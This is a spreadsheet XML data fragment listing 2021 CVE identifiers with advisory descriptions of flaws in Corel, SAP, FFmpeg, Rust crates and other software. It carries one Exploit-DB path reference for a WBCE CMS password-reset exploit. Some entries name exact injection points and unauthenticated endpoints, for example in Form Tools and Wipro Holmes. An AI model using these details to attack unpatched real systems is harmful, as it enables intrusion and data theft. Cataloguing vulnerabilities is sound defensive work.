  <si>
    <t>object-path is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')</t>
  </si>
  <si>
    <t>CVE-2021-3806</t>
  </si>
  <si>
    <t>A path traversal vulnerability on Pardus Software Center's "extractArchive" function could allow anyone on the same network to do a man-in-the-middle and write files on the system.</t>
  </si>
  <si>
    <t>CVE-2021-3807</t>
  </si>
  <si>
    <t>ansi-regex is vulnerable to Inefficient Regular Expression Complexity</t>
  </si>
  <si>
    <t>CVE-2021-38084</t>
  </si>
  <si>
    <t>An issue was discovered in the POP3 component of Courier Mail Server before 1.1.5. Meddler-in-the-middle attackers can pipeline commands after the POP3 STLS command, injecting plaintext commands into an encrypted user session.</t>
  </si>
  <si>
    <t>CVE-2021-38085</t>
  </si>
  <si>
    <t>The Canon TR150 print driver through 3.71.2.10 is vulnerable to a privilege escalation issue. During the add printer process, a local attacker can overwrite CNMurGE.dll and, if timed properly, the overwritten DLL will be loaded into a SYSTEM process resulting in escalation of privileges. This occurs because the driver drops a world-writable DLL into a CanonBJ %PROGRAMDATA% location that gets loaded by printisolationhost (a system process).</t>
  </si>
  <si>
    <t>CVE-2021-38086</t>
  </si>
  <si>
    <t>Acronis Cyber Protect 15 for Windows prior to build 27009 and Acronis Agent for Windows prior to build 26226 allowed local privilege escalation via DLL hijacking.</t>
  </si>
  <si>
    <t>CVE-2021-38087</t>
  </si>
  <si>
    <t>Reflected cross-site scripting (XSS) was possible on the login page in Acronis Cyber Protect 15 prior to build 27009.</t>
  </si>
  <si>
    <t>CVE-2021-38088</t>
  </si>
  <si>
    <t>Acronis Cyber Protect 15 for Windows prior to build 27009 allowed local privilege escalation via binary hijacking.</t>
  </si>
  <si>
    <t>CVE-2021-38090</t>
  </si>
  <si>
    <t>Integer Overflow vulnerability in function filter16_roberts in libavfilter/vf_convolution.c in Ffmpeg 4.2.1, allows attackers to cause a Denial of Service or other unspecified impacts.</t>
  </si>
  <si>
    <t>CVE-2021-38091</t>
  </si>
  <si>
    <t>Integer Overflow vulnerability in function filter16_sobel in libavfilter/vf_convolution.c in Ffmpeg 4.2.1, allows attackers to cause a Denial of Service or other unspecified impacts.</t>
  </si>
  <si>
    <t>CVE-2021-38092</t>
  </si>
  <si>
    <t>Integer Overflow vulnerability in function filter_prewitt in libavfilter/vf_convolution.c in Ffmpeg 4.2.1, allows attackers to cause a Denial of Service or other unspecified impacts.</t>
  </si>
  <si>
    <t>CVE-2021-38093</t>
  </si>
  <si>
    <t>Integer Overflow vulnerability in function filter_robert in libavfilter/vf_convolution.c in Ffmpeg 4.2.1, allows attackers to cause a Denial of Service or other unspecified impacts.</t>
  </si>
  <si>
    <t>CVE-2021-38094</t>
  </si>
  <si>
    <t>Integer Overflow vulnerability in function filter_sobel in libavfilter/vf_convolution.c in Ffmpeg 4.2.1, allows attackers to cause a Denial of Service or other unspecified impacts.</t>
  </si>
  <si>
    <t>CVE-2021-38095</t>
  </si>
  <si>
    <t>The REST API in Planview Spigit 4.5.3 allows remote unauthenticated attackers to query sensitive user accounts data, as demonstrated by an api/v1/users/1 request.</t>
  </si>
  <si>
    <t>CVE-2021-38096</t>
  </si>
  <si>
    <t>Coreip.dll in Corel PDF Fusion 2.6.2.0 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PDF file.</t>
  </si>
  <si>
    <t>CVE-2021-38097</t>
  </si>
  <si>
    <t>Corel PDF Fusion 2.6.2.0 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PDF file.</t>
  </si>
  <si>
    <t>CVE-2021-38098</t>
  </si>
  <si>
    <t>Corel PDF Fusion 2.6.2.0 is affected by a Heap Corruption vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PDF file.</t>
  </si>
  <si>
    <t>CVE-2021-38099</t>
  </si>
  <si>
    <t>CDRRip.dll in Corel PhotoPaint Standard 2020 22.0.0.474 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CPT file. This is different from CVE-2021-38101.</t>
  </si>
  <si>
    <t>CVE-2021-3810</t>
  </si>
  <si>
    <t>code-server is vulnerable to Inefficient Regular Expression Complexity</t>
  </si>
  <si>
    <t>CVE-2021-38100</t>
  </si>
  <si>
    <t>Corel PhotoPaint Standard 2020 22.0.0.474 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CPT file.</t>
  </si>
  <si>
    <t>CVE-2021-38101</t>
  </si>
  <si>
    <t>CDRRip.dll in Corel PhotoPaint Standard 2020 22.0.0.474 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CPT file. This is different from CVE-2021-38099.</t>
  </si>
  <si>
    <t>CVE-2021-38102</t>
  </si>
  <si>
    <t>IPPP82.FLT in Corel Presentations 2020 20.0.0.200 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file. This is different from CVE-2021-38105.</t>
  </si>
  <si>
    <t>CVE-2021-38103</t>
  </si>
  <si>
    <t>IBJPG2.FLT in Corel Presentations 2020 20.0.0.200 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file.</t>
  </si>
  <si>
    <t>CVE-2021-38104</t>
  </si>
  <si>
    <t>IPPP72.FLT in Corel Presentations 2020 20.0.0.200 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file.</t>
  </si>
  <si>
    <t>CVE-2021-38105</t>
  </si>
  <si>
    <t>IPPP82.FLT in Corel Presentations 2020 20.0.0.200 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file. This is different from CVE-2021-38102.</t>
  </si>
  <si>
    <t>CVE-2021-38106</t>
  </si>
  <si>
    <t>UAX200.dll in Corel Presentations 2020 20.0.0.200 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file.</t>
  </si>
  <si>
    <t>CVE-2021-38107</t>
  </si>
  <si>
    <t>CdrCore.dll in Corel DrawStandard 2020 22.0.0.474 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CDR file.</t>
  </si>
  <si>
    <t>CVE-2021-38108</t>
  </si>
  <si>
    <t>Word97Import200.dll in Corel WordPerfect 2020 20.0.0.200 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious DOC file.</t>
  </si>
  <si>
    <t>CVE-2021-38109</t>
  </si>
  <si>
    <t>Corel DrawStandard 2020 22.0.0.474 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CDR file.</t>
  </si>
  <si>
    <t>CVE-2021-3811</t>
  </si>
  <si>
    <t>adminlte is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CVE-2021-38110</t>
  </si>
  <si>
    <t>Word97Import200.dll in Corel WordPerfect 2020 20.0.0.200 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious DOC file.</t>
  </si>
  <si>
    <t>CVE-2021-38111</t>
  </si>
  <si>
    <t>The DEF CON 27 badge allows remote attackers to exploit a buffer overflow by sending an oversized packet via the NFMI (Near Field Magnetic Induction) protocol.</t>
  </si>
  <si>
    <t>CVE-2021-38112</t>
  </si>
  <si>
    <t>In the Amazon AWS WorkSpaces client 3.0.10 through 3.1.8 on Windows, argument injection in the workspaces:// URI handler can lead to remote code execution because of the Chromium Embedded Framework (CEF) --gpu-launcher argument. This is fixed in 3.1.9.</t>
  </si>
  <si>
    <t>CVE-2021-38113</t>
  </si>
  <si>
    <t>In addBouquet in js/bqe.js in OpenWebif (aka e2openplugin-OpenWebif) through 1.4.7, inserting JavaScript into the Add Bouquet feature of the Bouquet Editor (i.e., bouqueteditor/api/addbouquet?name=) leads to Stored XSS.</t>
  </si>
  <si>
    <t>CVE-2021-38114</t>
  </si>
  <si>
    <t>libavcodec/dnxhddec.c in FFmpeg 4.4 does not check the return value of the init_vlc function, a similar issue to CVE-2013-0868.</t>
  </si>
  <si>
    <t>CVE-2021-38115</t>
  </si>
  <si>
    <t>read_header_tga in gd_tga.c in the GD Graphics Library (aka LibGD) through 2.3.2 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted TGA file.</t>
  </si>
  <si>
    <t>CVE-2021-3812</t>
  </si>
  <si>
    <t>CVE-2021-38123</t>
  </si>
  <si>
    <t>Open Redirect vulnerability in Micro Focus Network Automation, affecting Network Automation versions 10.4x, 10.5x, 2018.05, 2018.11, 2019.05, 2020.02, 2020.08, 2020.11, 2021.05. The vulnerability could allow redirect users to malicious websites after authentication.</t>
  </si>
  <si>
    <t>CVE-2021-38124</t>
  </si>
  <si>
    <t>Remote Code Execution vulnerability in Micro Focus ArcSight Enterprise Security Manager (ESM) product, affecting versions 7.0.2 through 7.5. The vulnerability could be exploited resulting in remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-38125</t>
  </si>
  <si>
    <t>Unauthenticated remote code execution in Micro Focus Operations Bridge containerized, affecting versions 2021.05, 2021.08, and newer versions of Micro Focus Operations Bridge containerized if the deployment was upgraded from 2021.05 or 2021.08. The vulnerability could be exploited to unauthenticated remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-38126</t>
  </si>
  <si>
    <t>Potential vulnerabilities have been identified in Micro Focus ArcSight Enterprise Security Manager, affecting versions 7.4.x and 7.5.x. The vulnerabilities could be remotely exploited resulting in Cross-Site Scripting (XSS).</t>
  </si>
  <si>
    <t>CVE-2021-38127</t>
  </si>
  <si>
    <t>CVE-2021-38129</t>
  </si>
  <si>
    <t>Escalation of privileges vulnerability in Micro Focus in Micro Focus Operations Agent, affecting versions 12.x up to and including 12.21. The vulnerability could be exploited by a non-privileged local user to access system monitoring data collected by Operations Agent.</t>
  </si>
  <si>
    <t>CVE-2021-3813</t>
  </si>
  <si>
    <t>Improper Privilege Management in GitHub repository chatwoot/chatwoot prior to v2.2.</t>
  </si>
  <si>
    <t>CVE-2021-38130</t>
  </si>
  <si>
    <t>A potential Information leakage vulnerability has been identified in versions of Micro Focus Voltage SecureMail Mail Relay prior to 7.3.0.1. The vulnerability could be exploited to create an information leakage attack.</t>
  </si>
  <si>
    <t>CVE-2021-38136</t>
  </si>
  <si>
    <t>Corero SecureWatch Managed Services 9.7.2.0020 is affected by a Path Traversal vulnerability via the snap_file parameter in the /it-IT/splunkd/__raw/services/get_snapshot HTTP API endpoint. A ‘low privileged’ attacker can read any file on the target host.</t>
  </si>
  <si>
    <t>CVE-2021-38137</t>
  </si>
  <si>
    <t>Corero SecureWatch Managed Services 9.7.2.0020 does not correctly check swa-monitor and cns-monitor user’s privileges, allowing a user to perform actions not belonging to his role.</t>
  </si>
  <si>
    <t>CVE-2021-38138</t>
  </si>
  <si>
    <t>OneNav beta 0.9.12 allows XSS via the Add Link feature. NOTE: the vendor's position is that there intentionally is not any XSS protection at present, because the attack risk is largely limited to a compromised account; however, XSS protection is planned for a future release.</t>
  </si>
  <si>
    <t>CVE-2021-3814</t>
  </si>
  <si>
    <t>It was found that 3scale's APIdocs does not validate the access token, in the case of invalid token, it uses session auth instead. This conceivably bypasses access controls and permits unauthorized information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-38140</t>
  </si>
  <si>
    <t>The set_user extension module before 2.0.1 for PostgreSQL allows a potential privilege escalation using RESET SESSION AUTHORIZATION after set_user().</t>
  </si>
  <si>
    <t>CVE-2021-38142</t>
  </si>
  <si>
    <t>Barco MirrorOp Windows Sender before 2.5.3.65 uses cleartext HTTP and thus allows rogue software upgrades. An attacker on the local network can achieve remote code execution on any computer that tries to update Windows Sender due to the fact that the upgrade mechanism is not secured (is not protected with TLS).</t>
  </si>
  <si>
    <t>CVE-2021-38143</t>
  </si>
  <si>
    <t>An issue was discovered in Form Tools through 3.0.20. When an administrator creates a customer account, it is possible for the customer to log in and proceed with a change of name and last name. However, these fields are vulnerable to XSS payload insertion, being triggered in the admin panel when the admin tries to see the client list. This type of XSS (stored) can lead to the extraction of the PHPSESSID cookie belonging to the admin.</t>
  </si>
  <si>
    <t>CVE-2021-38144</t>
  </si>
  <si>
    <t>An issue was discovered in Form Tools through 3.0.20. A low-privileged user can trigger Reflected XSS when a viewing a form via the submission_id parameter, e.g., clients/forms/edit_submission.php?form_id=1&amp;view_id=1&amp;submission_id=[XSS].</t>
  </si>
  <si>
    <t>CVE-2021-38145</t>
  </si>
  <si>
    <t>An issue was discovered in Form Tools through 3.0.20. SQL Injection can occur via the export_group_id field when a low-privileged user (client) tries to export a form with data, e.g., manipulation of modules/export_manager/export.php?export_group_id=1&amp;export_group_1_results=all&amp;export_type_id=1.</t>
  </si>
  <si>
    <t>CVE-2021-38146</t>
  </si>
  <si>
    <t>The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data.</t>
  </si>
  <si>
    <t>CVE-2021-38147</t>
  </si>
  <si>
    <t>Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel.</t>
  </si>
  <si>
    <t>CVE-2021-38148</t>
  </si>
  <si>
    <t>Obsidian before 0.12.12 does not require user confirmation for non-http/https URLs.</t>
  </si>
  <si>
    <t>CVE-2021-38149</t>
  </si>
  <si>
    <t>index.php/admin/add_user in Chikitsa Patient Management System 2.0.0 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2021-3815</t>
  </si>
  <si>
    <t>utils.js is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')</t>
  </si>
  <si>
    <t>CVE-2021-38150</t>
  </si>
  <si>
    <t>When an attacker manages to get access to the local memory, or the memory dump of a victim, for example by a social engineering attack, SAP Business Client versions - 7.0, 7.70, will allow him to read extremely sensitive data, such as credentials. This would allow the attacker to compromise the corresponding backend for which the credentials are valid.</t>
  </si>
  <si>
    <t>CVE-2021-38151</t>
  </si>
  <si>
    <t>index.php/appointment/todos in Chikitsa Patient Management System 2.0.0 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2021-38152</t>
  </si>
  <si>
    <t>index.php/appointment/insert_patient_add_appointment in Chikitsa Patient Management System 2.0.0 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2021-38153</t>
  </si>
  <si>
    <t>Some components in Apache Kafka use `Arrays.equals` to validate a password or key, which is vulnerable to timing attacks that make brute force attacks for such credentials more likely to be successful. Users should upgrade to 2.8.1 or higher, or 3.0.0 or higher where this vulnerability has been fixed. The affected versions include Apache Kafka 2.0.0, 2.0.1, 2.1.0, 2.1.1, 2.2.0, 2.2.1, 2.2.2, 2.3.0, 2.3.1, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.6.0, 2.6.1, 2.6.2, 2.7.0, 2.7.1, and 2.8.0.</t>
  </si>
  <si>
    <t>CVE-2021-38154</t>
  </si>
  <si>
    <t>Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.</t>
  </si>
  <si>
    <t>CVE-2021-38155</t>
  </si>
  <si>
    <t>OpenStack Keystone 10.x through 16.x before 16.0.2, 17.x before 17.0.1, 18.x before 18.0.1, and 19.x before 19.0.1 allows information disclosure during account locking (related to PCI DSS features). By guessing the name of an account and failing to authenticate multiple times, any unauthenticated actor could both confirm the account exists and obtain that account's corresponding UUID, which might be leveraged for other unrelated attacks. All deployments enabling security_compliance.lockout_failure_attempts are affected.</t>
  </si>
  <si>
    <t>CVE-2021-38156</t>
  </si>
  <si>
    <t>In Nagios XI before 5.8.6, XSS exists in the dashboard page (/dashboards/#) when administrative users attempt to edit a dashboard.</t>
  </si>
  <si>
    <t>CVE-2021-38157</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** LeoStream Connection Broker 9.x before 9.0.34.3 allows Unauthenticated Reflected XSS via the /index.pl user parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2021-38159</t>
  </si>
  <si>
    <t>In certain Progress MOVEit Transfer versions before 2021.0.4 (aka 13.0.4), SQL injection in the MOVEit Transfer web application could allow an unauthenticated remote attacker to gain access to the database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, or execute SQL statements that alter or delete database elements, via crafted strings sent to unique MOVEit Transfer transaction types. The fixed versions are 2019.0.8 (11.0.8), 2019.1.7 (11.1.7), 2019.2.4 (11.2.4), 2020.0.7 (12.0.7), 2020.1.6 (12.1.6), and 2021.0.4 (13.0.4).</t>
  </si>
  <si>
    <t>CVE-2021-3816</t>
  </si>
  <si>
    <t>Cacti 1.1.38 allows authenticated users with User Management permissions to inject arbitrary HTML in the group_prefix field during the creation of a new group via "Copy" method at user_group_admin.php.</t>
  </si>
  <si>
    <t>CVE-2021-38160</t>
  </si>
  <si>
    <t>** DISPUTED ** In drivers/char/virtio_console.c in the Linux kernel before 5.13.4, data corruption or loss can be triggered by an untrusted device that supplies a buf-&gt;len value exceeding the buffer size. NOTE: the vendor indicates that the cited data corruption is not a vulnerability in any existing use case; the length validation was added solely for robustness in the face of anomalous host OS behavior.</t>
  </si>
  <si>
    <t>CVE-2021-38161</t>
  </si>
  <si>
    <t>Improper Authentication vulnerability in TLS origin verification of Apache Traffic Server allows for man in the middle attacks. This issue affects Apache Traffic Server 8.0.0 to 8.0.8.</t>
  </si>
  <si>
    <t>CVE-2021-38162</t>
  </si>
  <si>
    <t>SAP Web Dispatcher versions - 7.49, 7.53, 7.77, 7.81, KRNL64NUC - 7.22, 7.22EXT, 7.49, KRNL64UC -7.22, 7.22EXT, 7.49, 7.53, KERNEL - 7.22, 7.49, 7.53, 7.77, 7.81, 7.83 processes allow an unauthenticated attacker to submit a malicious crafted request over a network to a front-end server which may, over several attempts, result in a back-end server confusing the boundaries of malicious and legitimate messages. This can result in the back-end server executing a malicious payload which can be used to read or modify any information on the server or consume server resources making it temporarily unavailable.</t>
  </si>
  <si>
    <t>CVE-2021-38163</t>
  </si>
  <si>
    <t>SAP NetWeaver (Visual Composer 7.0 RT) versions - 7.30, 7.31, 7.40, 7.50, without restriction, an attacker authenticated as a non-administrative user can upload a malicious file over a network and trigger its processing, which is capable of running operating system commands with the privilege of the Java Server process. These commands can be used to read or modify any information on the server or shut the server down making it unavailable.</t>
  </si>
  <si>
    <t>CVE-2021-38164</t>
  </si>
  <si>
    <t>SAP ERP Financial Accounting (RFOPENPOSTING_FR) versions - SAP_APPL - 600, 602, 603, 604, 605, 606, 616, SAP_FIN - 617, 618, 700, 720, 730, SAPSCORE - 125, S4CORE, 100, 101, 102, 103, 104, 105, allows a registered attacker to invoke certain functions that would otherwise be restricted to specific users. These functions are normally exposed over the network and once exploited the attacker may be able to view and modify financial accounting data that only a specific user should have access to.</t>
  </si>
  <si>
    <t>CVE-2021-38165</t>
  </si>
  <si>
    <t>Lynx through 2.8.9 mishandles the userinfo subcomponent of a URI, which allows remote attackers to discover cleartext credentials because they may appear in SNI data.</t>
  </si>
  <si>
    <t>CVE-2021-38166</t>
  </si>
  <si>
    <t>In kernel/bpf/hashtab.c in the Linux kernel through 5.13.8, there is an integer overflow and out-of-bounds write when many elements are placed in a single bucket. NOTE: exploitation might be impractical without the CAP_SYS_ADMIN capability.</t>
  </si>
  <si>
    <t>CVE-2021-38167</t>
  </si>
  <si>
    <t>Roxy-WI through 5.2.2.0 allows SQL Injection via check_login. An unauthenticated attacker can extract a valid uuid to bypass authentication.</t>
  </si>
  <si>
    <t>CVE-2021-38168</t>
  </si>
  <si>
    <t>Roxy-WI through 5.2.2.0 allows authenticated SQL injection via select_servers.</t>
  </si>
  <si>
    <t>CVE-2021-38169</t>
  </si>
  <si>
    <t>Roxy-WI through 5.2.2.0 allows command injection via /app/funct.py and /api/api_funct.py.</t>
  </si>
  <si>
    <t>CVE-2021-3817</t>
  </si>
  <si>
    <t>wbce_cms is vulnerable to Improper Neutralization of Special Elements used in an SQL Command</t>
  </si>
  <si>
    <t>exploits/php/webapps/50609.py</t>
  </si>
  <si>
    <t>WBCE CMS 1.5.1 - Admin Password Reset</t>
  </si>
  <si>
    <t>2021-12-20</t>
  </si>
  <si>
    <t>CVE-2021-38171</t>
  </si>
  <si>
    <t>adts_decode_extradata in libavformat/adtsenc.c in FFmpeg 4.4 does not check the init_get_bits return value, which is a necessary step because the second argument to init_get_bits can be crafted.</t>
  </si>
  <si>
    <t>CVE-2021-38172</t>
  </si>
  <si>
    <t>perM 0.4.0 has a Buffer Overflow related to strncpy. (Debian initially fixed this in 0.4.0-7.)</t>
  </si>
  <si>
    <t>CVE-2021-38173</t>
  </si>
  <si>
    <t>Btrbk before 0.31.2 allows command execution because of the mishandling of remote hosts filtering SSH commands using ssh_filter_btrbk.sh in authorized_keys.</t>
  </si>
  <si>
    <t>CVE-2021-38174</t>
  </si>
  <si>
    <t>When a user opens manipulated files received from untrusted sources in SAP 3D Visual Enterprise Viewer version - 9, the application crashes and becomes temporarily unavailable to the user until restart of the application.</t>
  </si>
  <si>
    <t>CVE-2021-38175</t>
  </si>
  <si>
    <t>SAP Analysis for Microsoft Office - version 2.8, allows an attacker with high privileges to read sensitive data over the network, and gather or change information in the current system without user interaction. The attack would not lead to an impact on the availability of the system, but there would be an impact on integrity and confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-38176</t>
  </si>
  <si>
    <t>Due to improper input sanitization, an authenticated user with certain specific privileges can remotely call NZDT function modules listed in Solution Section to execute manipulated query or inject ABAP code to gain access to Backend Database. On successful exploitation the threat actor could completely compromise confidentiality, integrity, and availability of the system.</t>
  </si>
  <si>
    <t>CVE-2021-38177</t>
  </si>
  <si>
    <t>SAP CommonCryptoLib version 8.5.38 or lower is vulnerable to null pointer dereference vulnerability when an unauthenticated attacker sends crafted malicious data in the HTTP requests over the network, this causes the SAP application to crash and has high impact on the availability of the SAP system.</t>
  </si>
  <si>
    <t>CVE-2021-38178</t>
  </si>
  <si>
    <t>The software logistics system of SAP NetWeaver AS ABAP and ABAP Platform versions - 700, 701, 702, 710, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, enables a malicious user to transfer ABAP code artifacts or content, by-passing the established quality gates. By this vulnerability malicious code can reach quality and production, and can compromise the confidentiality, integrity, and availability of the system and its data.</t>
  </si>
  <si>
    <t>CVE-2021-38179</t>
  </si>
  <si>
    <t>Debug function of Admin UI of SAP Business One Integration is enabled by default. This allows Admin User to see the captured packet contents which may include User credentials.</t>
  </si>
  <si>
    <t>CVE-2021-3818</t>
  </si>
  <si>
    <t>grav is vulnerable to Reliance on Cookies without Validation and Integrity Checking</t>
  </si>
  <si>
    <t>CVE-2021-38180</t>
  </si>
  <si>
    <t>SAP Business One - version 10.0, allows an attacker to inject formulas when exporting data to Excel (CSV injection) due to improper sanitation during the data export. An attacker could thereby execute arbitrary commands on the victim's computer but only if the victim allows to execute macros while opening the file and the security settings of Excel allow for command execution.</t>
  </si>
  <si>
    <t>CVE-2021-38181</t>
  </si>
  <si>
    <t>SAP NetWeaver AS ABAP and ABAP Platform - versions 700, 701, 702, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, allows an attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service.</t>
  </si>
  <si>
    <t>CVE-2021-38182</t>
  </si>
  <si>
    <t>Due to insufficient input validation of Kyma, authenticated users can pass a Header of their choice and escalate privileges which can completely compromise the cluster.</t>
  </si>
  <si>
    <t>CVE-2021-38183</t>
  </si>
  <si>
    <t>SAP NetWeaver - versions 700, 701, 702, 730, does not sufficiently encode user-controlled inputs, allowing an attacker to cause a potential victim to supply a malicious content to a vulnerable web application, which is then reflected to the victim and executed by the web browser, resulting in Cross-Site Scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-38185</t>
  </si>
  <si>
    <t>GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers an out-of-bounds heap write. NOTE: it is unclear whether there are common cases where the pattern file, associated with the -E option, is untrusted data.</t>
  </si>
  <si>
    <t>CVE-2021-38186</t>
  </si>
  <si>
    <t>An issue was discovered in the comrak crate before 0.10.1 for Rust. It mishandles &amp; characters, leading to XSS via &amp;# HTML entities.</t>
  </si>
  <si>
    <t>CVE-2021-38187</t>
  </si>
  <si>
    <t>An issue was discovered in the anymap crate through 0.12.1 for Rust. It violates soundness via conversion of a *u8 to a *u64.</t>
  </si>
  <si>
    <t>CVE-2021-38188</t>
  </si>
  <si>
    <t>An issue was discovered in the iced-x86 crate through 1.10.3 for Rust. In Decoder::new(), slice.get_unchecked(slice.length()) is used unsafely.</t>
  </si>
  <si>
    <t>CVE-2021-38189</t>
  </si>
  <si>
    <t>An issue was discovered in the lettre crate before 0.9.6 for Rust. In an e-mail message body, an attacker can place a . character after two &lt;CR&gt;&lt;LF&gt; sequences and then inject arbitrary SMTP commands.</t>
  </si>
  <si>
    <t>CVE-2021-3819</t>
  </si>
  <si>
    <t>CVE-2021-38190</t>
  </si>
  <si>
    <t>An issue was discovered in the nalgebra crate before 0.27.1 for Rust. It allows out-of-bounds memory access because it does not ensure that the number of elements is equal to the product of the row count and column count.</t>
  </si>
  <si>
    <t>CVE-2021-38191</t>
  </si>
  <si>
    <t>An issue was discovered in the tokio crate before 1.8.1 for Rust. Upon a JoinHandle::abort, a Task may be dropped in the wrong thread.</t>
  </si>
  <si>
    <t>CVE-2021-38192</t>
  </si>
  <si>
    <t>An issue was discovered in the prost-types crate before 0.8.0 for Rust. An overflow can occur during conversion from Timestamp to SystemTime.</t>
  </si>
  <si>
    <t>CVE-2021-38193</t>
  </si>
  <si>
    <t>An issue was discovered in the ammonia crate before 3.1.0 for Rust. XSS can occur because the parsing differences for HTML, SVG, and MathML are mishandled, a similar issue to CVE-2020-26870.</t>
  </si>
  <si>
    <t>CVE-2021-38194</t>
  </si>
  <si>
    <t>An issue was discovered in the ark-r1cs-std crate before 0.3.1 for Rust. It does not enforce any constraints in the FieldVar::mul_by_inverse method. Thus, a prover can produce a proof that is unsound but is nonetheless verified.</t>
  </si>
  <si>
    <t>CVE-2021-38195</t>
  </si>
  <si>
    <t>An issue was discovered in the libsecp256k1 crate before 0.5.0 for Rust. It can verify an invalid signature because it allows the R or S parameter to be larger than the curve order, aka an overflow.</t>
  </si>
  <si>
    <t>CVE-2021-38196</t>
  </si>
  <si>
    <t>An issue was discovered in the better-macro crate through 2021-07-22 for Rust. It intentionally demonstrates that remote attackers can execute arbitrary code via proc-macros, and otherwise has no legitimate purpose.</t>
  </si>
  <si>
    <t>CVE-2021-38197</t>
  </si>
  <si>
    <t>unarr.go in go-unarr (aka Go bindings for unarr) 0.1.1 allows Directory Traversal via ../ in a pathname within a TAR archive.</t>
  </si>
  <si>
    <t>CVE-2021-38198</t>
  </si>
  <si>
    <t>arch/x86/kvm/mmu/paging_tmpl.h in the Linux kernel before 5.12.11 incorrectly computes the access permissions of a shadow page, leading to a missing guest protection page fault.</t>
  </si>
  <si>
    <t>CVE-2021-38199</t>
  </si>
  <si>
    <t>fs/nfs/nfs4client.c in the Linux kernel before 5.13.4 has incorrect connection-setup ordering, which allows operators of remote NFSv4 servers to cause a denial of service (hanging of mounts) by arranging for those servers to be unreachable during trunking detection.</t>
  </si>
  <si>
    <t>CVE-2021-3820</t>
  </si>
  <si>
    <t>inflect is vulnerable to Inefficient Regular Expression Complexity</t>
  </si>
  <si>
    <t>CVE-2021-38200</t>
  </si>
  <si>
